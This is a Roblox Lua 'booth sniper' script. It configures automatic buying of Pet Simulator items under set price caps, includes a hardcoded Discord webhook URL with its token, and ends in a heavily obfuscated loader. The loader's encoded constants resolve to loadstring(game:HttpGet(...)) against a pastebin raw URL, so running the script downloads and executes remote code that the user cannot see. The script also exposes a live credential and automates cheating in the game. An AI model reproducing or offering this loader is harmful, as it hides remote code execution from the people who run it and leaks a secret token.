getgenv().config = {
    boothSniper = {
        autoSnipe = true,
        snipeItem = {
            {Class = "Misc", Name = "Crystal Key", Price = 20000}
        },
        extraItem = {
            {Class = "Misc", Name = "Secret Key Upper Half", Price = 10000},
            {Class = "Pet", Name = "Titanic Atlantean Jellyfish", Price = 1000000000},
            {Class = "Pet", Name = "Titanic axolotl", Price = 1000000000},
            {Class = "Pet", Name = "Titanic Balloon Monkey", Price = 1000000000},
            {Class = "Pet", Name = "Titanic Banana Cat", Price = 1000000000},
            {Class = "Pet", Name = "Titanic Bat Cat", Price = 1000000000},
            {Class = "Pet", Name = "Titanic Bejeweled Griffin", Price = 1000000000},
            {Class = "Pet", Name = "Titanic Black Hole Angelus", Price = 1000000000},
            {Class = "Pet", Name = "Titanic Blobfish", Price = 1000000000},
            {Class = "Pet", Name = "Titanic Blue Balloon Cat", Price = 1000000000},
            {Class = "Pet", Name = "Titanic Bread Shiba", Price = 1000000000},
            {Class = "Pet", Name = "Titanic Capybara", Price = 1000000000},
            {Class = "Pet", Name = "Titanic Cat", Price = 1000000000},
            {Class = "Pet", Name = "Titanic Cheerful Yeti", Price = 1000000000},
            {Class = "Pet", Name = "Titanic Corgi", Price = 1000000000},
            {Class = "Pet", Name = "Titanic Cosmic Pegasus", Price = 1000000000},
            {Class = "Pet", Name = "Titanic Emoji Corig", Price = 1000000000},
            {Class = "Pet", Name = "Titanic Fawn", Price = 1000000000},
            {Class = "Pet", Name = "Titanic Fire Dragon", Price = 1000000000},
            {Class = "Pet", Name = "Titanic Hippomelon", Price = 1000000000},
            {Class = "Pet", Name = "Titanic Hologram Cat", Price = 1000000000},
            {Class = "Pet", Name = "Titanic Hubert", Price = 1000000000},
            {Class = "Pet", Name = "Titanic Jelly Cat", Price = 1000000000},
            {Class = "Pet", Name = "Titanic Jelly Dragon", Price = 1000000000},
            {Class = "Pet", Name = "Titanic Jolly Cat", Price = 1000000000},
            {Class = "Pet", Name = "Titanic Kawaii Cat", Price = 1000000000},
            {Class = "Pet", Name = "Titanic Love Lamb", Price = 1000000000},
            {Class = "Pet", Name = "Titanic Lovemelon", Price = 1000000000},
            {Class = "Pet", Name = "Titanic Lucki", Price = 1000000000},
            {Class = "Pet", Name = "Titanic Monkey", Price = 1000000000},
            {Class = "Pet", Name = "Titanic Mystic Corgi", Price = 1000000000},
            {Class = "Pet", Name = "Titanic Neon Agony", Price = 1000000000},
            {Class = "Pet", Name = "Titanic Nightmare Cat", Price = 1000000000},
            {Class = "Pet", Name = "Titanic Party Cat", Price = 1000000000},
            {Class = "Pet", Name = "Titanic Pink Balloon Cat", Price = 1000000000},
            {Class = "Pet", Name = "Titanic Red Balloon Cat", Price = 1000000000},
            {Class = "Pet", Name = "Titanic Red Panda", Price = 1000000000},
            {Class = "Pet", Name = "Titanic Reindeer", Price = 1000000000},
            {Class = "Pet", Name = "Titanic Rich Cat", Price = 1000000000},
            {Class = "Pet", Name = "Titanic Scary Cat", Price = 1000000000},
            {Class = "Pet", Name = "Titanic Scary Corgi", Price = 1000000000},
            {Class = "Pet", Name = "Titanic Shadow Griffin", Price = 1000000000},
            {Class = "Pet", Name = "Titanic Shiba", Price = 1000000000},
            {Class = "Pet", Name = "Titanic Silver Dragon", Price = 1000000000},
            {Class = "Pet", Name = "Titanic Sketch Cat", Price = 1000000000},
            {Class = "Pet", Name = "Titanic Sock Cat", Price = 1000000000},
            {Class = "Pet", Name = "Titanic Sock Monkey", Price = 1000000000},
            {Class = "Pet", Name = "Titanic Tiedye Cat", Price = 1000000000},
            {Class = "Pet", Name = "Titanic Tiedye dragon", Price = 1000000000},
            {Class = "Pet", Name = "Titanic Valentine's Cat", Price = 1000000000},
            {Class = "Misc", Name = "Mini Chest", Price = 31000},
            {Class = "Misc", Name = "Crystal Key Upper Half", Price = 10000}
        }
    },
    snipingMethod = "Automated" --Terminal/Manual/Automated | Automated [BETA] checks if terminal is not working and then uses manual.
}

webhook = "https://discord.com/api/webhooks/1189216042250149918/Hk4tcVmlMgWWDY4fhXaIrEm-3jMY74yCjJDE5ppUh8pQiSJOXhGz_rR4_ZfXGXjYcOkL"

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=0;local v19;local v20;local v21;local v22;local v23;local v24;local v25;local v26;local v27;local v28;local v29;local v30;while true do if (v18==5) then v27=v24;v28=nil;function v28(...) return {...},v12("#",...);end v18=6;end if (v18==2) then function v22() local v31=v1(v16,v19,v19);v19=v19 + 1 ;return v31;end v23=nil;function v23() local v32,v33=v1(v16,v19,v19 + (5 -3) );v19=v19 + (5 -3) ;return (v33 * (493 -237)) + v32 ;end v18=3;end if (v18==4) then function v25() local v34=v24();local v35=v24();local v36=2 -1 ;local v37=(v21(v35,620 -(555 + 64) ,951 -(857 + 74) ) * ((570 -(367 + 201))^(959 -(214 + 713)))) + v34 ;local v38=v21(v35,21,(14 -6) + 23 );local v39=((v21(v35,6 + 26 )==(878 -(282 + (1091 -496)))) and  -1) or (1638 -(1523 + 114)) ;if (v38==(0 + (350 -(87 + 263)))) then if (v37==(0 -(180 -(67 + 113)))) then return v39 * (1065 -(68 + 997)) ;else local v78=1270 -(226 + 1044) ;while true do if (v78==(0 -0)) then v38=118 -(32 + 85) ;v36=0;break;end end end elseif (v38==2047) then return ((v37==(0 + 0)) and (v39 * ((1 + 0 + 0)/0))) or (v39 * NaN) ;end return v8(v39,v38-1023 ) * (v36 + (v37/((959 -((2189 -1297) + 65))^(123 -71)))) ;end v26=nil;function v26(v40) local v41;if  not v40 then local v69=0;while true do if (v69==(0 + (0 -0))) then v40=v24();if (v40==0) then return "";end break;end end end v41=v3(v16,v19,(v19 + v40) -((5 -2) -2) );v19=v19 + v40 ;local v42={};for v66=953 -(802 + 150) , #v41 do v42[v66]=v2(v1(v3(v41,v66,v66)));end return v6(v42);end v18=5;end if (v18==6) then v29=nil;function v29() local v43=0;local v44;local v45;local v46;local v47;local v48;local v49;while true do local v68=0 + 0 ;while true do if (v68~=(0 + 0)) then else if (v43==(7 -4)) then local v95=0 + 0 ;while true do if (v95~=(1130 -(87 + 1043))) then else for v116=449 -(10 + 438) ,v24() do v45[v116-(1 + 0) ]=v29();end return v47;end end end if (v43~=0) then else local v96=0 -0 ;local v97;while true do if (v96~=(0 + 0)) then else v97=0;while true do if (v97~=1) then else v46={};v43=1;break;end if (v97~=0) then else local v120=0;while true do if (v120~=1) then else v97=1181 -(1123 + 57) ;break;end if (v120==0) then v44={};v45={};v120=1;end end end end break;end end end v68=1 + 0 ;end if (v68==(255 -(163 + 91))) then if (v43==(1932 -(1869 + 61))) then for v99=1,v48 do local v100=0 + 0 ;local v101;local v102;while true do if (v100~=0) then else local v118=0 -0 ;while true do if (v118==(1 -0)) then v100=1;break;end if (v118~=(0 + 0)) then else v101=v22();v102=nil;v118=1 -0 ;end end end if (v100~=1) then else if (v101==1) then v102=v22()~=0 ;elseif (v101==2) then v102=v25();elseif (v101~=3) then else v102=v26();end v49[v99]=v102;break;end end end v47[3]=v22();for v103=1 + 0 ,v24() do local v104=1474 -(1329 + 145) ;local v105;local v106;local v107;local v108;while true do if (v104~=0) then else v105=971 -(140 + 831) ;v106=nil;v104=1;end if (v104==(1851 -(1409 + 441))) then v107=nil;v108=nil;v104=720 -(15 + 703) ;end if (v104==(1 + 1)) then while true do if (v105==(439 -(262 + 176))) then v108=nil;while true do if (v106==(1721 -(345 + 1376))) then local v156=0;local v157;while true do if (v156~=(688 -(198 + 490))) then else v157=0 -0 ;while true do if (v157==0) then v107=0;v108=nil;v157=2 -1 ;end if (v157==(1207 -(696 + 510))) then v106=1;break;end end break;end end end if (v106==1) then while true do if ((0 -0)~=v107) then else v108=v22();if (v21(v108,1263 -(1091 + 171) ,1 + 0 )~=0) then else local v162=0;local v163;local v164;local v165;while true do if (v162~=0) then else local v166=0;local v167;while true do if (v166~=(0 -0)) then else v167=0;while true do if (v167==(3 -2)) then v162=375 -(123 + 251) ;break;end if (v167==0) then local v176=0;while true do if (v176~=(4 -3)) then else v167=699 -(208 + 490) ;break;end if (v176==(0 + 0)) then v163=v21(v108,2,3);v164=v21(v108,2 + 2 ,842 -(660 + 176) );v176=1 + 0 ;end end end end break;end end end if (v162~=(204 -(14 + 188))) then else local v168=0;local v169;while true do if (v168~=0) then else v169=0;while true do if (v169==0) then if (v21(v164,1,1)==(676 -(534 + 141))) then v165[2]=v49[v165[1 + 1 ]];end if (v21(v164,2 + 0 ,2 + 0 )~=(1 -0)) then else v165[3]=v49[v165[3]];end v169=1;end if (v169==1) then v162=3;break;end end break;end end end if (3~=v162) then else if (v21(v164,4 -1 ,8 -5 )~=(1 + 0)) then else v165[4]=v49[v165[3 + 1 ]];end v44[v103]=v165;break;end if (1==v162) then v165={v23(),v23(),nil,nil};if (v163==(0 + 0)) then local v173=0 -0 ;local v174;while true do if (v173~=0) then else v174=0 -0 ;while true do if ((867 -(550 + 317))==v174) then v165[3 -0 ]=v23();v165[4]=v23();break;end end break;end end elseif (v163==(1 -0)) then v165[3]=v24();elseif (v163==2) then v165[3]=v24() -(2^(44 -28)) ;elseif (v163~=3) then else local v184=0;local v185;while true do if (v184~=(285 -(134 + 151))) then else v185=0;while true do if (v185==(1665 -(970 + 695))) then v165[5 -2 ]=v24() -(2^16) ;v165[4]=v23();break;end end break;end end end v162=2;end end end break;end end break;end end break;end if (v105==(1990 -(582 + 1408))) then local v121=0 -0 ;while true do if (v121~=1) then else v105=1;break;end if (v121==(0 -0)) then v106=0;v107=nil;v121=1;end end end end break;end end end v43=11 -8 ;end if (v43~=(1825 -(1195 + 629))) then else v47={v44,v45,nil,v46};v48=v24();v49={};v43=2;end break;end end end end v30=nil;v18=7;end if (v18==0) then v19=1;v20=nil;v16=v4(v3(v16,5),"..",function(v50) if (v1(v50,2)==79) then local v70=0;while true do if (v70==0) then v20=v0(v3(v50,1,1));return "";end end else local v71=0;local v72;while true do if (v71==0) then v72=v2(v0(v50,16));if v20 then local v109=v5(v72,v20);v20=nil;return v109;else return v72;end break;end end end end);v18=1;end if (v18==3) then v24=nil;function v24() local v51=(1877 -(1373 + 263)) -(187 + 54) ;local v52;local v53;local v54;local v55;while true do if (v51==(781 -(162 + 618))) then return (v55 * (11755749 + (5022467 -(451 + 549)))) + (v54 * (43650 + 21886)) + (v53 * 256) + v52 ;end if (v51==(0 -0)) then v52,v53,v54,v55=v1(v16,v19,v19 + (4 -1) );v19=v19 + 1 + 3 ;v51=1;end end end v25=nil;v18=4;end if (v18==7) then function v30(v56,v57,v58) local v59=0;local v60;local v61;local v62;while true do if (v59==1) then v62=v56[3];return function(...) local v79=v60;local v80=v61;local v81=v62;local v82=v28;local v83=1;local v84= -1;local v85={};local v86={...};local v87=v12("#",...) -1 ;local v88={};local v89={};for v93=0,v87 do if (v93>=v81) then v85[v93-v81 ]=v86[v93 + 1 ];else v89[v93]=v86[v93 + 1 ];end end local v90=(v87-v81) + 1 ;local v91;local v92;while true do local v94=0;while true do if (v94==0) then v91=v79[v83];v92=v91[1];v94=1;end if (v94==1) then if (v92<=3) then if (v92<=1) then if (v92>0) then local v122=v91[2];local v123=v89[v91[3]];v89[v122 + 1 ]=v123;v89[v122]=v123[v91[4]];else do return;end end elseif (v92==2) then v89[v91[2]]=v91[3];else local v129;local v130,v131;local v132;local v133;v89[v91[2]]=v58[v91[3]];v83=v83 + 1 ;v91=v79[v83];v89[v91[2]]=v58[v91[3]];v83=v83 + 1 ;v91=v79[v83];v133=v91[2];v132=v89[v91[3]];v89[v133 + 1 ]=v132;v89[v133]=v132[v91[4]];v83=v83 + 1 ;v91=v79[v83];v89[v91[2]]=v91[3];v83=v83 + 1 ;v91=v79[v83];v133=v91[2];v130,v131=v82(v89[v133](v13(v89,v133 + 1 ,v91[3])));v84=(v131 + v133) -1 ;v129=0;for v151=v133,v84 do local v152=0;while true do if (v152==0) then v129=v129 + 1 ;v89[v151]=v130[v129];break;end end end v83=v83 + 1 ;v91=v79[v83];v133=v91[2];v89[v133]=v89[v133](v13(v89,v133 + 1 ,v84));v83=v83 + 1 ;v91=v79[v83];v89[v91[2]]();v83=v83 + 1 ;v91=v79[v83];do return;end end elseif (v92<=5) then if (v92==4) then local v143=0;local v144;while true do if (v143==0) then v144=v91[2];v89[v144]=v89[v144](v13(v89,v144 + 1 ,v84));break;end end else v89[v91[2]]();end elseif (v92>6) then local v145=v91[2];local v146,v147=v82(v89[v145](v13(v89,v145 + 1 ,v91[3])));v84=(v147 + v145) -1 ;local v148=0;for v153=v145,v84 do v148=v148 + 1 ;v89[v153]=v146[v148];end else v89[v91[2]]=v58[v91[3]];end v83=v83 + 1 ;break;end end end end;end if (v59==0) then v60=v56[1];v61=v56[2];v59=1;end end end return v30(v29(),{},v17)(...);end if (v18==1) then v21=nil;function v21(v63,v64,v65) if v65 then local v73=(v63/((1 + 1)^(v64-(1 -0))))%((1 + 1)^(((v65-(1 -0)) -(v64-(1385 -(746 + 638)))) + 1 + 0)) ;return v73-(v73%((561 -(306 + 254)) -0)) ;else local v74=(343 -(218 + 123))^(v64-1) ;return (((v63%(v74 + v74))>=v74) and (1582 -(1535 + 46))) or (0 + 0 + 0) ;end end v22=nil;v18=2;end end end return v15("LOL!043O00030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403213O00682O7470733A2O2F706173746562696E2E636F6D2F7261772F77744E764B6E677400083O0012033O00013O00122O000100023O00202O00010001000300122O000300046O000100039O0000026O000100016O00017O00",v9(),...);
